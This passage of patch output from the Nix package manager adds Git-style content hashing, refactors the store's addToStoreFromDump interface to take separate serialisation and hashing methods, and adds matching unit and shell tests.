+    PathFilter & filter = defaultPathFilter);
+
+/**
+ * An enumeration of the ways we can ingest file system
+ * objects, producing a hash or digest.
+ */
+enum struct FileIngestionMethod : uint8_t {
+    /**
+     * Hash `FileSerialisationMethod::Flat` serialisation.
+     */
+    Flat,
+
+    /**
+     * Hash `FileSerialisationMethod::Git` serialisation.
+     */
+    Recursive,
+
+    /**
+     * Git hashing. In particular files are hashed as git "blobs", and
+     * directories are hashed as git "trees".
+     *
+     * Unlike `Flat` and `Recursive`, this is not a hash of a single
+     * serialisation but a [Merkle
+     * DAG](https://en.wikipedia.org/wiki/Merkle_tree) of multiple
+     * rounds of serialisation and hashing.
+     *
+     * @note Git's data model is slightly different, in that a plain
+     * file doesn't have an executable bit, directory entries do
+     * instead. We decide treat a bare file as non-executable by fiat,
+     * as we do with `FileIngestionMethod::Flat` which also lacks this
+     * information. Thus, Git can encode some but all of Nix's "File
+     * System Objects", and this sort of hashing is likewise partial.
+     */
+    Git,
+};
+
+/**
+ * Parse a `FileIngestionMethod` by name. Choice of:
+ *
+ *  - `flat`: `FileIngestionMethod::Flat`
+ *  - `nar`: `FileIngestionMethod::Recursive`
+ *  - `git`: `FileIngestionMethod::Git`
+ *
+ * Opposite of `renderFileIngestionMethod`.
+ */
+FileIngestionMethod parseFileIngestionMethod(std::string_view input);
+
+/**
+ * Render a `FileIngestionMethod` by name.
+ *
+ * Opposite of `parseFileIngestionMethod`.
+ */
+std::string_view renderFileIngestionMethod(FileIngestionMethod method);
+
+/**
+ * Compute the hash of the given file system object according to the
+ * given method.
+ *
+ * Unlike the other `hashPath`, this works on an arbitrary
+ * `FileIngestionMethod` instead of `FileSerialisationMethod`, but
+ * doesn't return the size as this is this is not a both simple and
+ * useful defined for a merkle format.
+ */
+Hash hashPath(
     SourceAccessor & accessor, const CanonPath & path,
     FileIngestionMethod method, HashAlgorithm ha,
     PathFilter & filter = defaultPathFilter);
diff --git a/src/nix-store/nix-store.cc b/src/nix-store/nix-store.cc
index 99dbfe6e3..7c8905da6 100644
--- a/src/nix-store/nix-store.cc
+++ b/src/nix-store/nix-store.cc
@@ -555,7 +555,7 @@ static void registerValidity(bool reregister, bool hashGiven, bool canonicalise)
                 HashResult hash = hashPath(
                     *store->getFSAccessor(false), CanonPath { store->printStorePath(info->path) },
 
-                    FileIngestionMethod::Recursive, HashAlgorithm::SHA256);
+                    FileSerialisationMethod::Recursive, HashAlgorithm::SHA256);
                 info->narHash = hash.first;
                 info->narSize = hash.second;
             }
diff --git a/src/nix/add-to-store.cc b/src/nix/add-to-store.cc
index ca2daecab..02154715f 100644
--- a/src/nix/add-to-store.cc
+++ b/src/nix/add-to-store.cc
@@ -2,6 +2,7 @@
 #include "common-args.hh"
 #include "store-api.hh"
 #include "archive.hh"
+#include "git.hh"
 #include "posix-source-accessor.hh"
 #include "misc-store-flags.hh"
 
diff --git a/src/nix/hash.cc b/src/nix/hash.cc
index 98d227f0e..f849bf0cf 100644
--- a/src/nix/hash.cc
+++ b/src/nix/hash.cc
@@ -5,6 +5,7 @@
 #include "shared.hh"
 #include "references.hh"
 #include "archive.hh"
+#include "git.hh"
 #include "posix-source-accessor.hh"
 #include "misc-store-flags.hh"
 
@@ -66,9 +67,11 @@ struct CmdHashBase : Command
     {
         switch (mode) {
         case FileIngestionMethod::Flat:
-            return  "print cryptographic hash of a regular file";
+            return "print cryptographic hash of a regular file";
         case FileIngestionMethod::Recursive:
             return "print cryptographic hash of the NAR serialisation of a path";
+        case FileIngestionMethod::Git:
+            return "print cryptographic hash of the Git serialisation of a path";
         default:
             assert(false);
         };
@@ -77,17 +80,41 @@ struct CmdHashBase : Command
     void run() override
     {
         for (auto path : paths) {
+            auto makeSink = [&]() -> std::unique_ptr {
+                if (modulus)
+                    return std::make_unique(hashAlgo, *modulus);
+                else
+                    return std::make_unique(hashAlgo);
+            };
 
-            std::unique_ptr hashSink;
-            if (modulus)
-                hashSink = std::make_unique(hashAlgo, *modulus);
-            else
-                hashSink = std::make_unique(hashAlgo);
+            auto [accessor_, canonPath] = PosixSourceAccessor::createAtRoot(path);
+            auto & accessor = accessor_;
+            Hash h { HashAlgorithm::SHA256 }; // throwaway def to appease C++
+            switch (mode) {
+            case FileIngestionMethod::Flat:
+            case FileIngestionMethod::Recursive:
+            {
+                auto hashSink = makeSink();
+                dumpPath(accessor, canonPath, *hashSink, (FileSerialisationMethod) mode);
+                h = hashSink->finish().first;
+                break;
+            }
+            case FileIngestionMethod::Git: {
+                std::function hook;
+                hook = [&](const CanonPath & path) -> git::TreeEntry {
+                    auto hashSink = makeSink();
+                    auto mode = dump(accessor, path, *hashSink, hook);
+                    auto hash = hashSink->finish().first;
+                    return {
+                        .mode = mode,
+                        .hash = hash,
+                    };
+                };
+                h = hook(canonPath).hash;
+                break;
+            }
+            }
 
-            auto [accessor, canonPath] = PosixSourceAccessor::createAtRoot(path);
-            dumpPath(accessor, canonPath, *hashSink, mode);
-
-            Hash h = hashSink->finish().first;
             if (truncate && h.hashSize > 20) h = compressHash(h, 20);
             logger->cout(h.to_string(hashFormat, hashFormat == HashFormat::SRI));
         }
diff --git a/tests/functional/git-hashing/common.sh b/tests/functional/git-hashing/common.sh
new file mode 100644
index 000000000..5de96e74f
--- /dev/null
+++ b/tests/functional/git-hashing/common.sh
@@ -0,0 +1,11 @@
+source ../common.sh
+
+clearStore
+clearCache
+
+# Need backend to support git-hashing too
+requireDaemonNewerThan "2.18.0pre20230908"
+
+enableFeatures "git-hashing"
+
+restartDaemon
diff --git a/tests/functional/git-hashing/local.mk b/tests/functional/git-hashing/local.mk
new file mode 100644
index 000000000..ebec01940
--- /dev/null
+++ b/tests/functional/git-hashing/local.mk
@@ -0,0 +1,7 @@
+git-hashing-tests := \
+  $(d)/simple.sh
+
+install-tests-groups += git-hashing
+
+clean-files += \
+  $(d)/config.nix
diff --git a/tests/functional/git-hashing/simple.sh b/tests/functional/git-hashing/simple.sh
new file mode 100644
index 000000000..74b0220f8
--- /dev/null
+++ b/tests/functional/git-hashing/simple.sh
@@ -0,0 +1,58 @@
+source common.sh
+
+repo="$TEST_ROOT/scratch"
+git init "$repo"
+
+git -C "$repo" config user.email "you@example.com"
+git -C "$repo" config user.name "Your Name"
+
+try () {
+    hash=$(nix hash path --mode git --format base16 --algo sha1 $TEST_ROOT/hash-path)
+    [[ "$hash" == "$1" ]]
+
+    git -C "$repo" rm -rf hash-path || true
+    cp -r "$TEST_ROOT/hash-path" "$TEST_ROOT/scratch/hash-path"
+    git -C "$repo" add hash-path
+    git -C "$repo" commit -m "x"
+    git -C "$repo" status
+    hash2=$(git -C "$TEST_ROOT/scratch" rev-parse HEAD:hash-path)
+    [[ "$hash2" = "$1" ]]
+}
+
+# blob
+rm -rf $TEST_ROOT/hash-path
+echo "Hello World" > $TEST_ROOT/hash-path
+try "557db03de997c86a4a028e1ebd3a1ceb225be238"
+
+# tree with children
+rm -rf $TEST_ROOT/hash-path
+mkdir $TEST_ROOT/hash-path
+echo "Hello World" > $TEST_ROOT/hash-path/hello
+echo "Run Hello World" > $TEST_ROOT/hash-path/executable
+chmod +x $TEST_ROOT/hash-path/executable
+try "e5c0a11a556801a5c9dcf330ca9d7e2c572697f4"
+
+rm -rf $TEST_ROOT/dummy1
+echo Hello World! > $TEST_ROOT/dummy1
+path1=$(nix store add --mode git --hash-algo sha1 $TEST_ROOT/dummy1)
+hash1=$(nix-store -q --hash $path1)
+test "$hash1" = "sha256:1brffhvj2c0z6x8qismd43m0iy8dsgfmy10bgg9w11szway2wp9v"
+
+rm -rf $TEST_ROOT/dummy2
+mkdir -p $TEST_ROOT/dummy2
+echo Hello World! > $TEST_ROOT/dummy2/hello
+path2=$(nix store add --mode git --hash-algo sha1 $TEST_ROOT/dummy2)
+hash2=$(nix-store -q --hash $path2)
+test "$hash2" = "sha256:1vhv7zxam7x277q0y0jcypm7hwhccbzss81vkdgf0ww5sm2am4y0"
+
+rm -rf $TEST_ROOT/dummy3
+mkdir -p $TEST_ROOT/dummy3
+mkdir -p $TEST_ROOT/dummy3/dir
+touch $TEST_ROOT/dummy3/dir/file
+echo Hello World! > $TEST_ROOT/dummy3/dir/file
+touch $TEST_ROOT/dummy3/dir/executable
+chmod +x $TEST_ROOT/dummy3/dir/executable
+echo Run Hello World! > $TEST_ROOT/dummy3/dir/executable
+path3=$(nix store add --mode git --hash-algo sha1 $TEST_ROOT/dummy3)
+hash3=$(nix-store -q --hash $path3)
+test "$hash3" = "sha256:08y3nm3mvn9qvskqnf13lfgax5lh73krxz4fcjd5cp202ggpw9nv"
diff --git a/tests/unit/libstore/content-address.cc b/tests/unit/libstore/content-address.cc
index 98c1eace3..cc1c7fcc6 100644
--- a/tests/unit/libstore/content-address.cc
+++ b/tests/unit/libstore/content-address.cc
@@ -13,6 +13,7 @@ TEST(ContentAddressMethod, testRoundTripPrintParse_1) {
         ContentAddressMethod { TextIngestionMethod {} },
         ContentAddressMethod { FileIngestionMethod::Flat },
         ContentAddressMethod { FileIngestionMethod::Recursive },
+        ContentAddressMethod { FileIngestionMethod::Git },
     }) {
         EXPECT_EQ(ContentAddressMethod::parse(cam.render()), cam);
     }
@@ -23,6 +24,7 @@ TEST(ContentAddressMethod, testRoundTripPrintParse_2) {
         "text",
         "flat",
         "nar",
+        "git",
     }) {
         EXPECT_EQ(ContentAddressMethod::parse(camS).render(), camS);
     }
diff --git a/tests/unit/libutil/file-content-address.cc b/tests/unit/libutil/file-content-address.cc
index 2e819ce40..294e39806 100644
--- a/tests/unit/libutil/file-content-address.cc
+++ b/tests/unit/libutil/file-content-address.cc
@@ -4,6 +4,32 @@
 
 namespace nix {
 
+/* ----------------------------------------------------------------------------
+ * parseFileSerialisationMethod, renderFileSerialisationMethod
+ * --------------------------------------------------------------------------*/
+
+TEST(FileSerialisationMethod, testRoundTripPrintParse_1) {
+    for (const FileSerialisationMethod fim : {
+        FileSerialisationMethod::Flat,
+        FileSerialisationMethod::Recursive,
+    }) {
+        EXPECT_EQ(parseFileSerialisationMethod(renderFileSerialisationMethod(fim)), fim);
+    }
+}
+
+TEST(FileSerialisationMethod, testRoundTripPrintParse_2) {
+    for (const std::string_view fimS : {
+        "flat",
+        "nar",
+    }) {
+        EXPECT_EQ(renderFileSerialisationMethod(parseFileSerialisationMethod(fimS)), fimS);
+    }
+}
+
+TEST(FileSerialisationMethod, testParseFileSerialisationMethodOptException) {
+    EXPECT_THROW(parseFileSerialisationMethod("narwhal"), UsageError);
+}
+
 /* ----------------------------------------------------------------------------
  * parseFileIngestionMethod, renderFileIngestionMethod
  * --------------------------------------------------------------------------*/
@@ -12,6 +38,7 @@ TEST(FileIngestionMethod, testRoundTripPrintParse_1) {
     for (const FileIngestionMethod fim : {
         FileIngestionMethod::Flat,
         FileIngestionMethod::Recursive,
+        FileIngestionMethod::Git,
     }) {
         EXPECT_EQ(parseFileIngestionMethod(renderFileIngestionMethod(fim)), fim);
     }
@@ -21,6 +48,7 @@ TEST(FileIngestionMethod, testRoundTripPrintParse_2) {
     for (const std::string_view fimS : {
         "flat",
         "nar",
+        "git",
     }) {
         EXPECT_EQ(renderFileIngestionMethod(parseFileIngestionMethod(fimS)), fimS);
     }

From d4ad1fcf303f6f34ebb30a82ebe6f99c26bef8cb Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Thu, 18 Jan 2024 23:57:26 -0500
Subject: [PATCH 525/654] Avoid creating temporary store object for git over
 the wire

Instead, serialize as NAR and send that over, then rehash sever side.
This is alorithmically simpler, but comes at the cost of a newer
parameter to `Store::addToStoreFromDump`.

Co-authored-by: Eelco Dolstra 
---
 src/libexpr/primops.cc                      |  2 +-
 src/libstore/binary-cache-store.cc          | 27 +++++---
 src/libstore/binary-cache-store.hh          |  3 +-
 src/libstore/build/local-derivation-goal.cc |  5 +-
 src/libstore/daemon.cc                      | 59 ++++++++--------
 src/libstore/derivations.cc                 |  2 +-
 src/libstore/dummy-store.cc                 |  3 +-
 src/libstore/legacy-ssh-store.hh            |  3 +-
 src/libstore/local-store.cc                 | 77 ++++++++-------------
 src/libstore/local-store.hh                 |  3 +-
 src/libstore/remote-store.cc                | 20 +++++-
 src/libstore/remote-store.hh                |  3 +-
 src/libstore/store-api.cc                   | 47 ++++---------
 src/libstore/store-api.hh                   | 17 +++--
 src/nix-env/user-env.cc                     |  2 +-
 src/nix/develop.cc                          |  2 +-
 16 files changed, 137 insertions(+), 138 deletions(-)

diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 9ea266cf9..78f7f71ed 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -2092,7 +2092,7 @@ static void prim_toFile(EvalState & state, const PosIdx pos, Value * * args, Val
         })
         : ({
             StringSource s { contents };
-            state.store->addToStoreFromDump(s, name, TextIngestionMethod {}, HashAlgorithm::SHA256, refs, state.repair);
+            state.store->addToStoreFromDump(s, name, FileSerialisationMethod::Flat, TextIngestionMethod {}, HashAlgorithm::SHA256, refs, state.repair);
         });
 
     /* Note: we don't need to add `context' to the context of the
diff --git a/src/libstore/binary-cache-store.cc b/src/libstore/binary-cache-store.cc
index d6047dd7e..bea2bb370 100644
--- a/src/libstore/binary-cache-store.cc
+++ b/src/libstore/binary-cache-store.cc
@@ -305,7 +305,8 @@ void BinaryCacheStore::addToStore(const ValidPathInfo & info, Source & narSource
 StorePath BinaryCacheStore::addToStoreFromDump(
     Source & dump,
     std::string_view name,
-    ContentAddressMethod method,
+    FileSerialisationMethod dumpMethod,
+    ContentAddressMethod hashMethod,
     HashAlgorithm hashAlgo,
     const StorePathSet & references,
     RepairFlag repair)
@@ -313,17 +314,26 @@ StorePath BinaryCacheStore::addToStoreFromDump(
     std::optional caHash;
     std::string nar;
 
+    // Calculating Git hash from NAR stream not yet implemented. May not
+    // be possible to implement in single-pass if the NAR is in an
+    // inconvenient order. Could fetch after uploading, however.
+    if (hashMethod.getFileIngestionMethod() == FileIngestionMethod::Git)
+        unsupported("addToStoreFromDump");
+
     if (auto * dump2p = dynamic_cast(&dump)) {
         auto & dump2 = *dump2p;
         // Hack, this gives us a "replayable" source so we can compute
         // multiple hashes more easily.
-        caHash = hashString(HashAlgorithm::SHA256, dump2.s);
-        switch (method.getFileIngestionMethod()) {
-        case FileIngestionMethod::Recursive:
+        //
+        // Only calculate if the dump is in the right format, however.
+        if (static_cast(dumpMethod) == hashMethod.getFileIngestionMethod())
+            caHash = hashString(HashAlgorithm::SHA256, dump2.s);
+        switch (dumpMethod) {
+        case FileSerialisationMethod::Recursive:
             // The dump is already NAR in this case, just use it.
             nar = dump2.s;
             break;
-        case FileIngestionMethod::Flat:
+        case FileSerialisationMethod::Flat:
         {
             // The dump is Flat, so we need to convert it to NAR with a
             // single file.
@@ -332,14 +342,11 @@ StorePath BinaryCacheStore::addToStoreFromDump(
             nar = std::move(s.s);
             break;
         }
-        case FileIngestionMethod::Git:
-            unsupported("addToStoreFromDump");
-            break;
         }
     } else {
         // Otherwise, we have to do th same hashing as NAR so our single
         // hash will suffice for both purposes.
-        if (method != FileIngestionMethod::Recursive || hashAlgo != HashAlgorithm::SHA256)
+        if (dumpMethod != FileSerialisationMethod::Recursive || hashAlgo != HashAlgorithm::SHA256)
             unsupported("addToStoreFromDump");
     }
     StringSource narDump { nar };
@@ -354,7 +361,7 @@ StorePath BinaryCacheStore::addToStoreFromDump(
             *this,
             name,
             ContentAddressWithReferences::fromParts(
-                method,
+                hashMethod,
                 caHash ? *caHash : nar.first,
                 {
                     .others = references,
diff --git a/src/libstore/binary-cache-store.hh b/src/libstore/binary-cache-store.hh
index 76de2d11a..7c2828309 100644
--- a/src/libstore/binary-cache-store.hh
+++ b/src/libstore/binary-cache-store.hh
@@ -125,7 +125,8 @@ public:
     StorePath addToStoreFromDump(
         Source & dump,
         std::string_view name,
-        ContentAddressMethod method,
+        FileSerialisationMethod dumpMethod,
+        ContentAddressMethod hashMethod,
         HashAlgorithm hashAlgo,
         const StorePathSet & references,
         RepairFlag repair) override;
diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc
index d92966a74..a9b8de123 100644
--- a/src/libstore/build/local-derivation-goal.cc
+++ b/src/libstore/build/local-derivation-goal.cc
@@ -1312,12 +1312,13 @@ struct RestrictedStore : public virtual RestrictedStoreConfig, public virtual In
     StorePath addToStoreFromDump(
         Source & dump,
         std::string_view name,
-        ContentAddressMethod method,
+        FileSerialisationMethod dumpMethod,
+        ContentAddressMethod hashMethod,
         HashAlgorithm hashAlgo,
         const StorePathSet & references,
         RepairFlag repair) override
     {
-        auto path = next->addToStoreFromDump(dump, name, method, hashAlgo, references, repair);
+        auto path = next->addToStoreFromDump(dump, name, dumpMethod, hashMethod, hashAlgo, references, repair);
         goal.addDependency(path);
         return path;
     }
diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc
index 873065e14..e1337f51d 100644
--- a/src/libstore/daemon.cc
+++ b/src/libstore/daemon.cc
@@ -401,11 +401,23 @@ static void performOp(TunnelLogger * logger, ref store,
             logger->startWork();
             auto pathInfo = [&]() {
                 // NB: FramedSource must be out of scope before logger->stopWork();
-                auto [contentAddressMethod, hashAlgo_] = ContentAddressMethod::parseWithAlgo(camStr);
-                auto hashAlgo = hashAlgo_; // work around clang bug
+                auto [contentAddressMethod, hashAlgo] = ContentAddressMethod::parseWithAlgo(camStr);
                 FramedSource source(from);
+                FileSerialisationMethod dumpMethod;
+                switch (contentAddressMethod.getFileIngestionMethod()) {
+                case FileIngestionMethod::Flat:
+                    dumpMethod = FileSerialisationMethod::Flat;
+                    break;
+                case FileIngestionMethod::Recursive:
+                    dumpMethod = FileSerialisationMethod::Recursive;
+                    break;
+                case FileIngestionMethod::Git:
+                    // Use NAR; Git is not a serialization method
+                    dumpMethod = FileSerialisationMethod::Recursive;
+                    break;
+                }
                 // TODO these two steps are essentially RemoteStore::addCAToStore. Move it up to Store.
-                auto path = store->addToStoreFromDump(source, name, contentAddressMethod, hashAlgo, refs, repair);
+                auto path = store->addToStoreFromDump(source, name, dumpMethod, contentAddressMethod, hashAlgo, refs, repair);
                 return store->queryPathInfo(path);
             }();
             logger->stopWork();
@@ -431,34 +443,23 @@ static void performOp(TunnelLogger * logger, ref store,
                 hashAlgo = parseHashAlgo(hashAlgoRaw);
             }
 
+            // Old protocol always sends NAR, regardless of hashing method
             auto dumpSource = sinkToSource([&](Sink & saved) {
-                if (method == FileIngestionMethod::Recursive) {
-                    /* We parse the NAR dump through into `saved` unmodified,
-                       so why all this extra work? We still parse the NAR so
-                       that we aren't sending arbitrary data to `saved`
-                       unwittingly`, and we know when the NAR ends so we don't
-                       consume the rest of `from` and can't parse another
-                       command. (We don't trust `addToStoreFromDump` to not
-                       eagerly consume the entire stream it's given, past the
-                       length of the Nar. */
-                    TeeSource savedNARSource(from, saved);
-                    NullFileSystemObjectSink sink; /* just parse the NAR */
-                    parseDump(sink, savedNARSource);
-                } else if (method == FileIngestionMethod::Flat) {
-                    /* Incrementally parse the NAR file, stripping the
-                       metadata, and streaming the sole file we expect into
-                       `saved`. */
-                    RegularFileSink savedRegular { saved };
-                    parseDump(savedRegular, from);
-                    if (!savedRegular.regular) throw Error("regular file expected");
-                } else {
-                    /* Should have validated above that no other file ingestion
-                       method was used. */
-                    assert(false);
-                }
+                /* We parse the NAR dump through into `saved` unmodified,
+                   so why all this extra work? We still parse the NAR so
+                   that we aren't sending arbitrary data to `saved`
+                   unwittingly`, and we know when the NAR ends so we don't
+                   consume the rest of `from` and can't parse another
+                   command. (We don't trust `addToStoreFromDump` to not
+                   eagerly consume the entire stream it's given, past the
+                   length of the Nar. */
+                TeeSource savedNARSource(from, saved);
+                NullFileSystemObjectSink sink; /* just parse the NAR */
+                parseDump(sink, savedNARSource);
             });
             logger->startWork();
-            auto path = store->addToStoreFromDump(*dumpSource, baseName, method, hashAlgo);
+            auto path = store->addToStoreFromDump(
+                *dumpSource, baseName, FileSerialisationMethod::Recursive, method, hashAlgo);
             logger->stopWork();
 
             to << store->printStorePath(path);
@@ -490,7 +491,7 @@ static void performOp(TunnelLogger * logger, ref store,
         logger->startWork();
         auto path = ({
             StringSource source { s };
-            store->addToStoreFromDump(source, suffix, TextIngestionMethod {}, HashAlgorithm::SHA256, refs, NoRepair);
+            store->addToStoreFromDump(source, suffix, FileSerialisationMethod::Flat, TextIngestionMethod {}, HashAlgorithm::SHA256, refs, NoRepair);
         });
         logger->stopWork();
         to << store->printStorePath(path);
diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc
index 305ed5b42..df14e979f 100644
--- a/src/libstore/derivations.cc
+++ b/src/libstore/derivations.cc
@@ -150,7 +150,7 @@ StorePath writeDerivation(Store & store,
         })
         : ({
             StringSource s { contents };
-            store.addToStoreFromDump(s, suffix, TextIngestionMethod {}, HashAlgorithm::SHA256, references, repair);
+            store.addToStoreFromDump(s, suffix, FileSerialisationMethod::Flat, TextIngestionMethod {}, HashAlgorithm::SHA256, references, repair);
         });
 }
 
diff --git a/src/libstore/dummy-store.cc b/src/libstore/dummy-store.cc
index e4f13b8f4..30f23cff9 100644
--- a/src/libstore/dummy-store.cc
+++ b/src/libstore/dummy-store.cc
@@ -61,7 +61,8 @@ struct DummyStore : public virtual DummyStoreConfig, public virtual Store
     virtual StorePath addToStoreFromDump(
         Source & dump,
         std::string_view name,
-        ContentAddressMethod method = FileIngestionMethod::Recursive,
+        FileSerialisationMethod dumpMethod = FileSerialisationMethod::Recursive,
+        ContentAddressMethod hashMethod = FileIngestionMethod::Recursive,
         HashAlgorithm hashAlgo = HashAlgorithm::SHA256,
         const StorePathSet & references = StorePathSet(),
         RepairFlag repair = NoRepair) override
diff --git a/src/libstore/legacy-ssh-store.hh b/src/libstore/legacy-ssh-store.hh
index ae890177b..ca2f115d2 100644
--- a/src/libstore/legacy-ssh-store.hh
+++ b/src/libstore/legacy-ssh-store.hh
@@ -72,7 +72,8 @@ struct LegacySSHStore : public virtual LegacySSHStoreConfig, public virtual Stor
     virtual StorePath addToStoreFromDump(
         Source & dump,
         std::string_view name,
-        ContentAddressMethod method = FileIngestionMethod::Recursive,
+        FileSerialisationMethod dumpMethod = FileSerialisationMethod::Recursive,
+        ContentAddressMethod hashMethod = FileIngestionMethod::Recursive,
         HashAlgorithm hashAlgo = HashAlgorithm::SHA256,
         const StorePathSet & references = StorePathSet(),
         RepairFlag repair = NoRepair) override
diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc
index 5f35cf3a8..56f8c5dd8 100644
--- a/src/libstore/local-store.cc
+++ b/src/libstore/local-store.cc
@@ -1148,7 +1148,8 @@ void LocalStore::addToStore(const ValidPathInfo & info, Source & source,
 StorePath LocalStore::addToStoreFromDump(
     Source & source0,
     std::string_view name,
-    ContentAddressMethod method,
+    FileSerialisationMethod dumpMethod,
+    ContentAddressMethod hashMethod,
     HashAlgorithm hashAlgo,
     const StorePathSet & references,
     RepairFlag repair)
@@ -1201,7 +1202,13 @@ StorePath LocalStore::addToStoreFromDump(
     Path tempDir;
     AutoCloseFD tempDirFd;
 
-    if (!inMemory) {
+    bool methodsMatch = (FileIngestionMethod) dumpMethod == hashMethod;
+
+    /* If the methods don't match, our streaming hash of the dump is the
+       wrong sort, and we need to rehash. */
+    bool inMemoryAndDontNeedRestore = inMemory && methodsMatch;
+
+    if (!inMemoryAndDontNeedRestore) {
         /* Drain what we pulled so far, and then keep on pulling */
         StringSource dumpSource { dump };
         ChainSource bothSource { dumpSource, source };
@@ -1210,40 +1217,23 @@ StorePath LocalStore::addToStoreFromDump(
         delTempDir = std::make_unique(tempDir);
         tempPath = tempDir + "/x";
 
-        auto fim = method.getFileIngestionMethod();
-        switch (fim) {
-        case FileIngestionMethod::Flat:
-        case FileIngestionMethod::Recursive:
-            restorePath(tempPath, bothSource, (FileSerialisationMethod) fim);
-            break;
-        case FileIngestionMethod::Git: {
-            RestoreSink sink;
-            sink.dstPath = tempPath;
-            auto accessor = getFSAccessor();
-            git::restore(sink, bothSource, [&](Hash childHash) {
-                return std::pair {
-                    &*accessor,
-                    CanonPath {
-                        printStorePath(this->makeFixedOutputPath("git", FixedOutputInfo {
-                            .method = FileIngestionMethod::Git,
-                            .hash = childHash,
-                        }))
-                    },
-                };
-            });
-            break;
-        }
-        }
+        restorePath(tempPath, bothSource, dumpMethod);
 
         dumpBuffer.reset();
         dump = {};
     }
 
-    auto [hash, size] = hashSink->finish();
+    auto [dumpHash, size] = hashSink->finish();
+
+    PosixSourceAccessor accessor;
 
     auto desc = ContentAddressWithReferences::fromParts(
-        method,
-        hash,
+        hashMethod,
+        methodsMatch
+            ? dumpHash
+            : hashPath(
+                accessor, CanonPath { tempPath },
+                hashMethod.getFileIngestionMethod(), hashAlgo),
         {
             .others = references,
             // caller is not capable of creating a self-reference, because this is content-addressed without modulus
@@ -1269,32 +1259,19 @@ StorePath LocalStore::addToStoreFromDump(
 
             autoGC();
 
-            if (inMemory) {
+            if (inMemoryAndDontNeedRestore) {
                 StringSource dumpSource { dump };
                 /* Restore from the buffer in memory. */
-                auto fim = method.getFileIngestionMethod();
+                auto fim = hashMethod.getFileIngestionMethod();
                 switch (fim) {
                 case FileIngestionMethod::Flat:
                 case FileIngestionMethod::Recursive:
                     restorePath(realPath, dumpSource, (FileSerialisationMethod) fim);
                     break;
-                case FileIngestionMethod::Git: {
-                    RestoreSink sink;
-                    sink.dstPath = realPath;
-                    auto accessor = getFSAccessor();
-                    git::restore(sink, dumpSource, [&](Hash childHash) {
-                        return std::pair {
-                            &*accessor,
-                            CanonPath {
-                                printStorePath(this->makeFixedOutputPath("git", FixedOutputInfo {
-                                    .method = FileIngestionMethod::Git,
-                                    .hash = childHash,
-                                }))
-                            },
-                        };
-                    });
-                    break;
-                }
+                case FileIngestionMethod::Git:
+                    // doesn't correspond to serialization method, so
+                    // this should be unreachable
+                    assert(false);
                 }
             } else {
                 /* Move the temporary path we restored above. */
@@ -1303,8 +1280,8 @@ StorePath LocalStore::addToStoreFromDump(
 
             /* For computing the nar hash. In recursive SHA-256 mode, this
                is the same as the store hash, so no need to do it again. */
-            auto narHash = std::pair { hash, size };
-            if (method != FileIngestionMethod::Recursive || hashAlgo != HashAlgorithm::SHA256) {
+            auto narHash = std::pair { dumpHash, size };
+            if (dumpMethod != FileSerialisationMethod::Recursive || hashAlgo != HashAlgorithm::SHA256) {
                 HashSink narSink { HashAlgorithm::SHA256 };
                 dumpPath(realPath, narSink);
                 narHash = narSink.finish();
diff --git a/src/libstore/local-store.hh b/src/libstore/local-store.hh
index ba56d3ead..7eff1d690 100644
--- a/src/libstore/local-store.hh
+++ b/src/libstore/local-store.hh
@@ -180,7 +180,8 @@ public:
     StorePath addToStoreFromDump(
         Source & dump,
         std::string_view name,
-        ContentAddressMethod method,
+        FileSerialisationMethod dumpMethod,
+        ContentAddressMethod hashMethod,
         HashAlgorithm hashAlgo,
         const StorePathSet & references,
         RepairFlag repair) override;
diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc
index 0cae84828..8dfe8adda 100644
--- a/src/libstore/remote-store.cc
+++ b/src/libstore/remote-store.cc
@@ -509,12 +509,28 @@ ref RemoteStore::addCAToStore(
 StorePath RemoteStore::addToStoreFromDump(
     Source & dump,
     std::string_view name,
-    ContentAddressMethod method,
+    FileSerialisationMethod dumpMethod,
+    ContentAddressMethod hashMethod,
     HashAlgorithm hashAlgo,
     const StorePathSet & references,
     RepairFlag repair)
 {
-    return addCAToStore(dump, name, method, hashAlgo, references, repair)->path;
+    FileSerialisationMethod fsm;
+    switch (hashMethod.getFileIngestionMethod()) {
+    case FileIngestionMethod::Flat:
+        fsm = FileSerialisationMethod::Flat;
+        break;
+    case FileIngestionMethod::Recursive:
+        fsm = FileSerialisationMethod::Recursive;
+        break;
+    case FileIngestionMethod::Git:
+        // Use NAR; Git is not a serialization method
+        fsm = FileSerialisationMethod::Recursive;
+        break;
+    }
+    if (fsm != dumpMethod)
+        unsupported("RemoteStore::addToStoreFromDump doesn't support this `dumpMethod` `hashMethod` combination");
+    return addCAToStore(dump, name, hashMethod, hashAlgo, references, repair)->path;
 }
 
 
diff --git a/src/libstore/remote-store.hh b/src/libstore/remote-store.hh
index c51a21375..d630adc08 100644
--- a/src/libstore/remote-store.hh
+++ b/src/libstore/remote-store.hh
@@ -87,7 +87,8 @@ public:
     StorePath addToStoreFromDump(
         Source & dump,
         std::string_view name,
-        ContentAddressMethod method = FileIngestionMethod::Recursive,
+        FileSerialisationMethod dumpMethod = FileSerialisationMethod::Recursive,
+        ContentAddressMethod hashMethod = FileIngestionMethod::Recursive,
         HashAlgorithm hashAlgo = HashAlgorithm::SHA256,
         const StorePathSet & references = StorePathSet(),
         RepairFlag repair = NoRepair) override;
diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc
index c44612ec5..4356296d4 100644
--- a/src/libstore/store-api.cc
+++ b/src/libstore/store-api.cc
@@ -197,40 +197,23 @@ StorePath Store::addToStore(
     PathFilter & filter,
     RepairFlag repair)
 {
+    FileSerialisationMethod fsm;
+    switch (method.getFileIngestionMethod()) {
+    case FileIngestionMethod::Flat:
+        fsm = FileSerialisationMethod::Flat;
+        break;
+    case FileIngestionMethod::Recursive:
+        fsm = FileSerialisationMethod::Recursive;
+        break;
+    case FileIngestionMethod::Git:
+        // Use NAR; Git is not a serialization method
+        fsm = FileSerialisationMethod::Recursive;
+        break;
+    }
     auto source = sinkToSource([&](Sink & sink) {
-        auto fim = method.getFileIngestionMethod();
-        switch (fim) {
-        case FileIngestionMethod::Flat:
-        case FileIngestionMethod::Recursive:
-        {
-            dumpPath(accessor, path, sink, (FileSerialisationMethod) fim, filter);
-            break;
-        }
